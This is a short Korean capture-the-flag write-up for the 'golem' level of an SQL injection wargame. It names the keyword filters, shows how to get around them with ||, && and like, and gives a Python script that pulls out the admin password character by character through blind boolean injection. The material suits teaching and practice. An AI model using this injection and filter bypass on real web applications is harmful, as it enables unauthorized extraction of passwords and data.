문제 분석
- or, and, substr(, =를 필터링 하고 있다.
- pw를 찾으면 문제를 풀 수 있다.
문제 풀이
각 필터링은 다음과 같이 우회할 수 있다.
or -> - and -> &&
- = -> like
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
import requests
cookie = {'PHPSESSID': '사용자세션'}
address = 'https://los.rubiya.kr/chall/golem_4b5202cfedd8160e73124b5234235ef5.php'
string = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
def find_length():
pw_len = 1
while 1:
url = f"{address}?pw=' || id like 'admin' %26%26 length(pw) like '{pw_len}'%23"
res = requests.get(url, cookies=cookie)
if "Hello admin" in res.text:
print(f'[+] Password Length : {pw_len}')
return pw_len
pw_len += 1
def find_password(pw_len):
answer = ''
for i in range(1,pw_len+1):
for j in string:
url = f"{address}?pw=' || substring(pw,{i},1) like '{j}'%23"
res = requests.get(url, cookies=cookie)
if "Hello admin" in res.text:
answer += j
break
print(f'[+] Find Password : {answer}')
find_password(find_length())
